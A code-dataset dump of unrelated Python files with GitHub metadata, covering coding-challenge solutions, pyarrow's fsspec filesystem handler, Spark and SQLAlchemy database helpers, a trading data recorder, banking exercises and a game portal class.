ucnserver/ios.py
ios.py
py
1,522
python
en
code
0
github-code
6
5503800628
# https://www.hackerrank.com/challenges/np-dot-and-cross/problem import numpy numpy.set_printoptions(legacy='1.13') def zero(size): return [0 for _ in range(size)] def get_matrix(size): matrix = [] for _ in range(size): matrix.append(list(map(int, input().split()))) return matrix N = int(input()) matrix1 = numpy.array(get_matrix(N)) matrix2 = numpy.array(get_matrix(N)).transpose() result = [] for row in range(N): result.append(zero(N)) for column in range(N): result[row][column] = int(numpy.dot(matrix1[row], matrix2[column])) print(numpy.array(result))
Nikit-370/HackerRank-Solution
Python/dot-cross.py
dot-cross.py
py
608
python
en
code
10
github-code
6
26221879462
from pyarrow._fs import ( # noqa FileSelector, FileType, FileInfo, FileSystem, LocalFileSystem, SubTreeFileSystem, _MockFileSystem, _normalize_path, FileSystemHandler, PyFileSystem, ) # For backward compatibility. FileStats = FileInfo _not_imported = [] try: from pyarrow._hdfs import HadoopFileSystem # noqa except ImportError: _not_imported.append("HadoopFileSystem") try: from pyarrow._s3fs import ( # noqa S3FileSystem, S3LogLevel, initialize_s3, finalize_s3) except ImportError: _not_imported.append("S3FileSystem") else: initialize_s3() def __getattr__(name): if name in _not_imported: raise ImportError( "The pyarrow installation is not built with support for " "'{0}'".format(name) ) raise AttributeError( "module 'pyarrow.fs' has no attribute '{0}'".format(name) ) def _ensure_filesystem(filesystem, use_mmap=False): if isinstance(filesystem, FileSystem): return filesystem # handle fsspec-compatible filesystems try: import fsspec except ImportError: pass else: if isinstance(filesystem, fsspec.AbstractFileSystem): if type(filesystem).__name__ == 'LocalFileSystem': # In case its a simple LocalFileSystem, use native arrow one return LocalFileSystem(use_mmap=use_mmap) return PyFileSystem(FSSpecHandler(filesystem)) # map old filesystems to new ones from pyarrow.filesystem import LocalFileSystem as LegacyLocalFileSystem if isinstance(filesystem, LegacyLocalFileSystem): return LocalFileSystem(use_mmap=use_mmap) # TODO handle HDFS? raise TypeError("Unrecognized filesystem: {}".format(type(filesystem))) class FSSpecHandler(FileSystemHandler): """ Handler for fsspec-based Python filesystems. https://filesystem-spec.readthedocs.io/en/latest/index.html >>> PyFileSystem(FSSpecHandler(fsspec_fs)) """ def __init__(self, fs): self.fs = fs def __eq__(self, other): if isinstance(other, FSSpecHandler): return self.fs == other.fs return NotImplemented def __ne__(self, other): if isinstance(other, FSSpecHandler): return self.fs != other.fs return NotImplemented def get_type_name(self): protocol = self.fs.protocol if isinstance(protocol, list): protocol = protocol[0] return "fsspec+{0}".format(protocol) @staticmethod def _create_file_info(path, info): size = info["size"] if info["type"] == "file": ftype = FileType.File elif info["type"] == "directory": ftype = FileType.Directory # some fsspec filesystems include a file size for directories size = None else: ftype = FileType.Unknown return FileInfo(path, ftype, size=size, mtime=info.get("mtime", None)) def get_file_info(self, paths): infos = [] for path in paths: try: info = self.fs.info(path) except FileNotFoundError: infos.append(FileInfo(path, FileType.NotFound)) else: infos.append(self._create_file_info(path, info)) return infos def get_file_info_selector(self, selector): if not self.fs.isdir(selector.base_dir): if self.fs.exists(selector.base_dir): raise NotADirectoryError(selector.base_dir) else: if selector.allow_not_found: return [] else: raise FileNotFoundError(selector.base_dir) if selector.recursive: maxdepth = None else: maxdepth = 1 infos = [] selected_files = self.fs.find( selector.base_dir, maxdepth=maxdepth, withdirs=True, detail=True ) for path, info in selected_files.items(): infos.append(self._create_file_info(path, info)) return infos def create_dir(self, path, recursive): # mkdir also raises FileNotFoundError when base directory is not found self.fs.mkdir(path, create_parents=recursive) def delete_dir(self, path): self.fs.rm(path, recursive=True) def _delete_dir_contents(self, path): for subpath in self.fs.listdir(path, detail=False): if self.fs.isdir(subpath): self.fs.rm(subpath, recursive=True) elif self.fs.isfile(subpath): self.fs.rm(subpath) def delete_dir_contents(self, path): if path.strip("/") == "": raise ValueError( "delete_dir_contents called on path '", path, "'") self._delete_dir_contents(path) def delete_root_dir_contents(self): self._delete_dir_contents("/") def delete_file(self, path): # fs.rm correctly raises IsADirectoryError when `path` is a directory # instead of a file and `recursive` is not set to True if not self.fs.exists(path): raise FileNotFoundError(path) self.fs.rm(path) def move(self, src, dest): self.fs.mv(src, dest, recursive=True) def copy_file(self, src, dest): # fs.copy correctly raises IsADirectoryError when `src` is a directory # instead of a file self.fs.copy(src, dest) def open_input_stream(self, path): from pyarrow import PythonFile if not self.fs.isfile(path): raise FileNotFoundError(path) return PythonFile(self.fs.open(path, mode="rb"), mode="r") def open_input_file(self, path): from pyarrow import PythonFile if not self.fs.isfile(path): raise FileNotFoundError(path) return PythonFile(self.fs.open(path, mode="rb"), mode="r") def open_output_stream(self, path): from pyarrow import PythonFile return PythonFile(self.fs.open(path, mode="wb"), mode="w") def open_append_stream(self, path): from pyarrow import PythonFile return PythonFile(self.fs.open(path, mode="ab"), mode="w")
ejnunn/PPE-Object-Detection
env/lib/python3.7/site-packages/pyarrow/fs.py
fs.py
py
6,213
python
en
code
7
github-code
6
22919129693
from io import TextIOWrapper import os import argparse files = [ 'Accurect-Pointer.txt', 'Endonasal-RII.txt', 'HeadBand-Reference.txt', 'Navigation-Pointer.txt', 'Registration-Pointer.txt' ] def readFromOriginalFormat(file: TextIOWrapper): lines = file.readlines() for i, line in enumerate(lines): if line.startswith('Num Markers:'): numMarkers = int(line.split(':')[1].strip()) if line.startswith('Marker Positions'): break data = lines[i+2:i+numMarkers+2] data = [float(x) for line in data for x in line.split()] return data, numMarkers def writeToNewFormat(data: list, numMarkers: int, file: TextIOWrapper): file.write(str(numMarkers) + '\n') for i in range(0, numMarkers*3, 3): file.write('{} {} {}\n'.format(data[i], data[i+1], data[i+2])) file.write('\n') if __name__ == '__main__': argparser = argparse.ArgumentParser() argparser.add_argument('-d', '--directory', help='root directory of the files', required=True) args = argparser.parse_args() if not os.path.exists(args.directory): os.mkdir(f'{args.directory}/converted/') for file in files: with open(f'{args.directory}/{file}', 'r') as f: data, numMarkers = readFromOriginalFormat(f) with open(f'{args.directory}/converted/{file}', 'w') as f: writeToNewFormat(data, numMarkers, f) print(f'{file} converted')
odeaxcsh/ParsissCamera
Scripts/CovertToolPatternFilesFormat.py
CovertToolPatternFilesFormat.py
py
1,486
python
en
code
0
github-code
6
3438407871
""" # Definition for a Node. class Node: def __init__(self, val = 0, neighbors = None): self.val = val self.neighbors = neighbors if neighbors is not None else [] """ class Solution: def cloneGraph(self, node: 'Node') -> 'Node': if node is None: return None q = deque([node]) cloned_node = Node(node.val) dic = {node: cloned_node} while len(q) != 0: node = q.popleft() cloned = dic[node] for neighbor in node.neighbors: if neighbor not in dic: dic[neighbor] = Node(neighbor.val) q.append(neighbor) cloned.neighbors.append(dic[neighbor]) return cloned_node
cuiy0006/Algorithms
leetcode/133. Clone Graph.py
133. Clone Graph.py
py
772
python
en
code
0
github-code
6
21112708622
from .plugin import Plugin import js2py # 插件名称 name = '测试插件' # 描述信息 description = """ 仅供测试 """ # 作者 author = 'kksanyu' # 是否启用该插件 enable = True # 演示js代码 jsAddFunc = """ function add(a, b) { return a + b; } """ class Demo(Plugin): def run(self, options): print('运行Demo::run', options.telephone) # raise RuntimeError('测试异常') add = js2py.eval_js(jsAddFunc) a = 1 b = 2 c = add(a, b) print('计算结果', c) def instance(): return Demo(name, description, author, enable)
superdashu/who_are_you
plugins/demo.py
demo.py
py
623
python
en
code
5
github-code
6
28669919345
import json import unittest from ..base import AsyncAPITestCase from yiyun.models import (User, Team, TeamMember, TeamMemberGroup, Sport, Activity, ActivityMember, TeamOrder) from yiyun.service.order import OrderService class UserOrderTestCase(AsyncAPITestCase): RETAIN_DATA = False json_header = True REQUIRED_MODELS = [Sport, User, Team, TeamMember, TeamMemberGroup, Activity, ActivityMember, TeamOrder] LIST_PATH = "api/2/users/self/orders" ORDER_DETAIL = LIST_PATH + "/{order_no}" def setUp(self): super(UserOrderTestCase, self).setUp() self.initial_data() def initial_data(self): self.team_owner = User.create(name='test_activity') self.team = Team.create(name='club_test_activity', owner_id=self.team_owner.id) self.user = self.creator = User.create(name='activity_creator') self.activity = Activity.create(team=self.team, creator=self.creator, price='10', vip_price='8', leader=self.creator, title='just a test', description='description', start_time='3000-01-01 00:00:01', end_time='3000-12-31 23:59:59') self.order = OrderService.new_order(10, self.team, self.user, TeamOrder.OrderType.ACTIVITY, TeamOrder.OrderPaymentMethod.WXPAY, self.activity.id, title="UserOrderTest" ) self.activity.add_member(self.user.id, users_count=1, price=10, free_times=0, total_fee=10, order_id=self.order.id, order_no=self.order.order_no, payment_method=TeamOrder.OrderPaymentMethod.WXPAY, payment_state=TeamOrder.OrderState.TRADE_BUYER_PAID, state=TeamMember.TeamMemberState.normal) def test_list_all_orders(self): self.auth_user = self.user response = self.fetch(self.LIST_PATH) self.assertEqual(200, response.code, response.body.decode()) result = json.loads(response.body.decode()) self.assertIn("orders", result, result) self.assertNotIn("id", result["orders"][0], result) def test_order_detail(self): url = self.ORDER_DETAIL.format(order_no=self.order.order_no) # 404, not my order self.auth_user = self.team_owner response = self.fetch(url) self.assertEqual(404, response.code, response.body.decode()) # 200 self.auth_user = self.user response = self.fetch(url) self.assertEqual(200, response.code, response.body.decode()) result = json.loads(response.body.decode()) self.assertEqual(self.user.id, result["user"]["id"], result) if __name__ == '__main__': unittest.main()
haoweiking/image_tesseract_private
PaiDuiGuanJia/yiyun/tests/rest/order.py
order.py
py
3,424
python
en
code
0
github-code
6
39735696907
class BankAccount: # Class attributes all_accounts = [] # Constructor for each account def __init__(self, int_rate=0.05, balance=0): self.int_rate = int_rate self.balance = balance BankAccount.all_accounts.append(self) def deposit(self, amount): self.balance += amount return self def withdraw(self, amount): if self.balance - amount >= 0: self.balance -= amount return self else: print(f"Insufficient funds: Charging a $5 fee") self.balance -= 5 return self def display_account_info(self): print(f"Balance: {self.balance}") return self def yield_interest(self): if self.balance >= 0: self.balance = self.balance + (self.balance * self.int_rate) return self @classmethod def get_account_info(cls): for inst in cls.all_accounts: inst.display_account_info() account1 = BankAccount() account2 = BankAccount() account3 = BankAccount(balance=150) account1.deposit(10).deposit(20).deposit(1000).withdraw(75).yield_interest() account2.deposit(300).deposit(150).withdraw(25).withdraw(5).withdraw(255).withdraw(2).yield_interest() BankAccount.get_account_info()
r-lutrick/Coding-Dojo
Python/Fundamentals/OOP/Bank_Account/bank_account.py
bank_account.py
py
1,277
python
en
code
1
github-code
6
22251439419
def dell(n): d = 2 mas = [] while d * d < n: if n % d == 0: mas.append(d) mas.append(n // d) d += 1 if d * d == n: mas.append(d) if len(mas) == 2: print(*mas) for i in range(338472, 338494 + 1): dell(i)
MakinFantasy/xo
25/10.06/1.py
1.py
py
285
python
en
code
0
github-code
6
32727491090
import sqlite3 posts = [ { 'author': 'Dova Kin', 'title': 'First Post', 'content': 'First post.', 'date_posted': '20200301' }, { 'author': 'Angi\'s Cabin', 'title': 'Second Post', 'content': 'Second post.', 'date_posted': '20200302' }, { 'author': 'Lydia Doorblocker', 'title': 'Third Post', 'content': 'I am sworn to carry your burdens.', 'date_posted': '20200302' } ] deletedb = """drop table if exists posts""" createdb = """create table if not exists posts ( author TEXT NOT NULL, title TEXT NOT NULL, content TEXT NOT NULL, date_posted TEXT NOT NULL ) """ insertdb = """ insert into posts ( author, title, content, date_posted) values ( :author, :title, :content, :date_posted ) """ with sqlite3.connect("posts.db") as conn: # with sqlite3.connect(":memory:") as conn: cursor = conn.cursor() cursor.execute( deletedb ) cursor.execute( createdb ) conn.commit() cursor.executemany( insertdb, posts ) conn.commit() cursor.execute("select * from posts") print(cursor.fetchall())
majorgear/flask_blog
utils/populate_db.py
populate_db.py
py
1,163
python
en
code
0
github-code
6
13202825418
import datetime menu = """ [d] Depositar [s] Sacar [e] Extrato [q] Sair => """ saldo = 0 limite = 500 extrato = [] numero_saques = 0 total_saque_diario = 0 LIMITE_SAQUES = 3 while True: opcao = input(menu) if opcao == 'd': valor = input('Valor do depósito (número inteiro e positivo): ') if valor.isdigit() and int(valor) > 0: valor = int(valor) saldo += valor data_hora = datetime.datetime.now() extrato.append(('d', valor, data_hora)) print('Depósito realizado com sucesso.') else: print( 'Valor de depósito inválido. O valor deve ser um número inteiro positivo.') elif opcao == 's': if numero_saques >= LIMITE_SAQUES: print('Quantidade de saques diários atingido.') else: try: valor = int(input('Valor do saque: ')) if valor > 0 and total_saque_diario + valor <= limite: if valor > saldo + limite: print('Saldo insuficiente.') else: saldo -= valor data_hora = datetime.datetime.now() extrato.append(('s', valor, data_hora)) numero_saques += 1 total_saque_diario = total_saque_diario + valor print('Saque realizado com sucesso.') else: print('Valor limite de saque diário atingido.') except ValueError: print('O valor do saque deve ser um número inteiro positivo.') elif opcao == 'e': print('\nExtrato Bancário') print('#####################################################\n') print('| OP | Data/Hora | Valor') print('-----------------------------------------------------') for operacao, valor, data_hora in extrato: if operacao == 'd': print( f'| D | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} | R${valor}') elif operacao == 's': print( f'| S | {data_hora.strftime("%d-%m-%Y %H:%M:%S")} |-R${valor}') print('-----------------------------------------------------') print('#####################################################') print( f'| Saldo em {data_hora.strftime("%d-%m-%Y %H:%M:%S")} -> R$ {saldo}') print('#####################################################\n') elif opcao == 'q': print('Você saiu do sistema...') break else: print('Opção inválida.')
ElPablitoBR/btc-c-d-desafio1
desafio.py
desafio.py
py
2,754
python
pt
code
0
github-code
6
74843183226
# encoding: UTF-8 from ctaStrategyTemplate import * from ctaObject import CtaBarData ######################################################################## class DataRecorder(CtaStrategyTemplate): """ 纯粹用来记录历史数据的工具(基于CTA策略), 建议运行在实际交易程序外的一个vn.trader实例中, 本工具会记录Tick和1分钟K线数据。 """ #---------------------------------------------------------------------- def __init__(self, ctaEngine, name, setting=None): """Constructor""" super(DataRecorder, self).__init__(ctaEngine, name, setting) self.strategyClassName = 'DataRecorder' self.author = u'用Python的交易员' self.tickDbName = 'VtTrader_Tick_Db' self.barDbName = 'VtTrader_1Min_Db' self.paramList.append('author') # 数据记录相关 self.bar = None # K线数据对象 self.barMinute = -1 # 当前的分钟,初始化设为-1 #---------------------------------------------------------------------- def init(self): """初始化""" self.writeCtaLog(u'数据记录工具%s初始化' %self.name) #---------------------------------------------------------------------- def start(self): """启动策略(必须由用户继承实现)""" self.writeCtaLog(u'数据记录工具%s启动' %self.name) #---------------------------------------------------------------------- def stop(self): """停止策略(必须由用户继承实现)""" self.writeCtaLog(u'数据记录工具%s停止' %self.name) #---------------------------------------------------------------------- def onTick(self, tick): """收到行情TICK推送""" # 收到Tick后,首先插入到数据库里 self.insertTick(tick) # 计算K线 tickMinute = tick.datetime.minute if tickMinute != self.barMinute: # 如果分钟变了,则把旧的K线插入数据库,并生成新的K线 if self.bar: self.onBar(self.bar) bar = CtaBarData() # 创建新的K线,目的在于防止之前K线对象在插入Mongo中被再次修改,导致出错 bar.vtSymbol = tick.vtSymbol bar.symbol = tick.symbol bar.exchange = tick.exchange bar.open = tick.lastPrice bar.high = tick.lastPrice bar.low = tick.lastPrice bar.close = tick.lastPrice bar.date = tick.date bar.time = tick.time bar.datetime = tick.datetime # K线的时间设为第一个Tick的时间 bar.volume = tick.volume bar.openInterest = tick.openInterest self.bar = bar # 这种写法为了减少一层访问,加快速度 self.barMinute = tickMinute # 更新当前的分钟 else: # 否则继续累加新的K线 bar = self.bar # 写法同样为了加快速度 bar.high = max(bar.high, tick.lastPrice) bar.low = min(bar.low, tick.lastPrice) bar.close = tick.lastPrice bar.volume = bar.volume + tick.volume # 成交量是累加的 bar.openInterest = tick.openInterest # 持仓量直接更新 #---------------------------------------------------------------------- def onOrder(self, order): """收到委托变化推送""" pass #---------------------------------------------------------------------- def onTrade(self, trade): """收到成交推送""" pass #---------------------------------------------------------------------- def onBar(self, bar): """收到Bar推送""" self.insertBar(bar)
LonelyHunter7/Backtesting_Syestem
vn.trader/ctaDataRecorder.py
ctaDataRecorder.py
py
4,091
python
en
code
1
github-code
6
42104820373
from pyspark import SparkContext, SparkConf from pyspark.sql import SparkSession class Reporter(object): def __init__(self, project, src_files, dst_table, keyfile, config): self.project = project self.src_files = src_files self.dst_table = dst_table self.keyfile = keyfile self.driver = config.get('mysql', 'driver') self.url = config.get('mysql', 'url') self.user = config.get('mysql', 'user') self.password = config.get('mysql', 'password') self.jar_dir = config.get('environment', 'jar_dir') self.submit_host = config.get('environment', 'submit_host') self.python_lib = config.get('environment', 'python_lib') self.python_files = self.get_list(config.get('environment', 'python_files')) def get_list(self, csv): raw_list = csv.split(',') stripped_list = [v.strip() for v in raw_list] return stripped_list def get_context(self, app_name, project, keyfile, submit_host, python_lib, python_files): # generate environment variables full_path_list = ['file:{python_lib}/{file}'.format(python_lib=python_lib, file=file) for file in python_files] full_paths = ','.join(full_path_list) python_path = ':'.join(python_files) # cluster execution conf = SparkConf() \ .setMaster(submit_host) \ .setAppName(app_name) \ .set('spark.yarn.dist.files','{full_paths}'.format(full_paths=full_paths)) \ .setExecutorEnv('PYTHONPATH','{python_path}'.format(python_path=python_path)) \ context = SparkContext(conf=conf) # Setup gcs Hadoop Configurations programmatically # Require Google Service account context._jsc.hadoopConfiguration().set("fs.gs.impl", "com.google.cloud.hadoop.fs.gcs.GoogleHadoopFileSystem") context._jsc.hadoopConfiguration().set("fs.gs.project.id", project) context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.enable", "true") context._jsc.hadoopConfiguration().set("google.cloud.auth.service.account.json.keyfile", keyfile) return context def get_session(self, context): session = SparkSession.builder \ .config(conf=context.getConf()) \ .getOrCreate() return session def get_src_df(self, session, src_files, type='json'): if type == 'json' : df = session.read.format("json") \ .option("header", "false") \ .option("inferSchema", "true") \ .load(src_files) else : df = session.read.format("csv") \ .option("delimiter", type) \ .option("header", "false") \ .load(src_files) return df def write_df_to_mysql(self, df): df.write.format('jdbc').options( url=self.url, driver=self.driver, dbtable=self.dst_table, user=self.user, password=self.password).mode('append').save()
ubermen/anomaly_detector
estimator/reporter/engines.py
engines.py
py
2,795
python
en
code
1
github-code
6
10930434466
import numpy as np from os import listdir from os.path import isfile, isdir, join import os import random cwd = os.getcwd() data_path = '/data/CUB_200_2011' savedir = './' dataset_list = ['base','val','novel'] #if not os.path.exists(savedir): # os.makedirs(savedir) folder_list = [f for f in listdir(join(data_path, 'train'))] classfile_list_all = [] for i, folder in enumerate(folder_list): classfiles = [] for split in ['train', 'test']: folder_path = join(join(data_path, split), folder) classfiles += [join(split, join(folder, cf)) for cf in listdir(folder_path)] classfile_list_all.append(classfiles) random.shuffle(classfile_list_all[i]) for dataset in dataset_list: file_list = [] label_list = [] for i, classfile_list in enumerate(classfile_list_all): if 'base' in dataset: if (i%2 == 0): file_list = file_list + classfile_list label_list = label_list + np.repeat(i, len(classfile_list)).tolist() if 'val' in dataset: if (i%4 == 1): file_list = file_list + classfile_list label_list = label_list + np.repeat(i, len(classfile_list)).tolist() if 'novel' in dataset: if (i%4 == 3): file_list = file_list + classfile_list label_list = label_list + np.repeat(i, len(classfile_list)).tolist() fo = open(savedir + dataset + ".json", "w") fo.write('{"label_names": [') fo.writelines(['"%s",' % item for item in folder_list]) fo.seek(0, os.SEEK_END) fo.seek(fo.tell()-1, os.SEEK_SET) fo.write('],') fo.write('"image_names": [') fo.writelines(['"%s",' % item for item in file_list]) fo.seek(0, os.SEEK_END) fo.seek(fo.tell()-1, os.SEEK_SET) fo.write('],') fo.write('"image_labels": [') fo.writelines(['%d,' % item for item in label_list]) fo.seek(0, os.SEEK_END) fo.seek(fo.tell()-1, os.SEEK_SET) fo.write(']}') fo.close() print("%s -OK" %dataset)
alinlab/PsCo
splits/cub200/write_cub_filelist.py
write_cub_filelist.py
py
2,032
python
en
code
42
github-code
6
23135790413
# -*- coding: utf-8 -*- """ Created on Tue Apr 9 21:16:51 2019 @author: eikivi """ from sqlalchemy import Column, Integer, String from sqlalchemy import create_engine from sqlalchemy import or_ engine = create_engine('sqlite:///sales.db', echo = False) from sqlalchemy.ext.declarative import declarative_base Base = declarative_base() class Customers(Base): __tablename__ = 'customers' id = Column(Integer, primary_key = True) name = Column(String) address = Column(String) email = Column(String) from sqlalchemy.orm import sessionmaker Session = sessionmaker(bind = engine) session = Session() try: # result = session.query(Customers).filter(or_(Customers.id>2, Customers.name.like('Ei%'))) #result = session.query(Customers).filter(Customers.id<2, Customers.name.like('Ja%')) result = session.query(Customers).filter(Customers.id != 2) #result = session.query(Customers).one() except: session.rollback() raise finally: session.close() print("") #print(result) for row in result: print("") print ("ID:", row.id, "Name: ",row.name, "Address:",row.address, "Email:",row.email)
baadam3/ICS0019_Advanced_python_solutions
Examples/Database_code/SQLAlchemyFilter7.py
SQLAlchemyFilter7.py
py
1,137
python
en
code
0
github-code
6
42933813764
import pyherc from pyherc.aspects import log_debug class Portal(): """ Portal linking two levels together """ @log_debug def __init__(self, icons, level_generator_name): """ Default constructor :param icons: (my_icon, icon for other end) :type icons: (integer, integer) :param level_generator_name: name of level generator for proxy portals :type level_generator_name: String """ super().__init__() self.level = None self.location = () self.__icons = icons self.__other_end = None self.exits_dungeon = False self.level_generator_name = level_generator_name self.model = None self.__update_listeners = [] @log_debug def get_other_end(self): """ Returns the other end of the portal :param level_generator_factory: factory to generate level generators :type level_generator_factory: LevelGeneratorFactory :returns: other end of the portal :rtype: Portal """ if self.__other_end is None: pyherc.vtable['\ufdd0:generate-level'](self.level_generator_name, self) return self.__other_end @log_debug def set_other_end(self, portal): """ Set the other end of the portal :param portal: portal where this one leads :type portal: Portal """ self.__other_end = portal @log_debug def __get_icon(self): """ Get icon to display this portal :returns: icon of the portal :rtype: integer """ return self.__icons[0] @log_debug def __set_icon(self, icon): """ Set icon to display this portal :param icon: icon to use for the portal :type icon: integer """ if self.__icons is None: self.__icons = (None, None) self.__icons = (icon, self.__icons[1]) @log_debug def __get_other_end_icon(self): """ Get icon used for other end of this portal :returns: icon of the other end :rtype: integer """ return self.__icons[1] @log_debug def register_for_updates(self, listener): """ Register listener to receive updates for this entity :param listener: listener to add :type listener: Listener .. versionadded:: 0.5 """ self.__update_listeners.append(listener) @log_debug def remove_from_updates(self, listener): """ Remove listener :param listener: listener to remove :type listener: Listener .. versionadded:: 0.5 """ self.__update_listeners.remove(listener) @log_debug def notify_update_listeners(self, event): """ Notify all listeners registered for update of this entity :param event: event to relay to update listeners :type event: Event .. versionadded:: 0.5 """ for listener in self.__update_listeners: listener.receive_update(event) icon = property(__get_icon, __set_icon) other_end_icon = property(__get_other_end_icon)
tuturto/pyherc
src/pyherc/data/portal.py
portal.py
py
3,215
python
en
code
43
github-code
6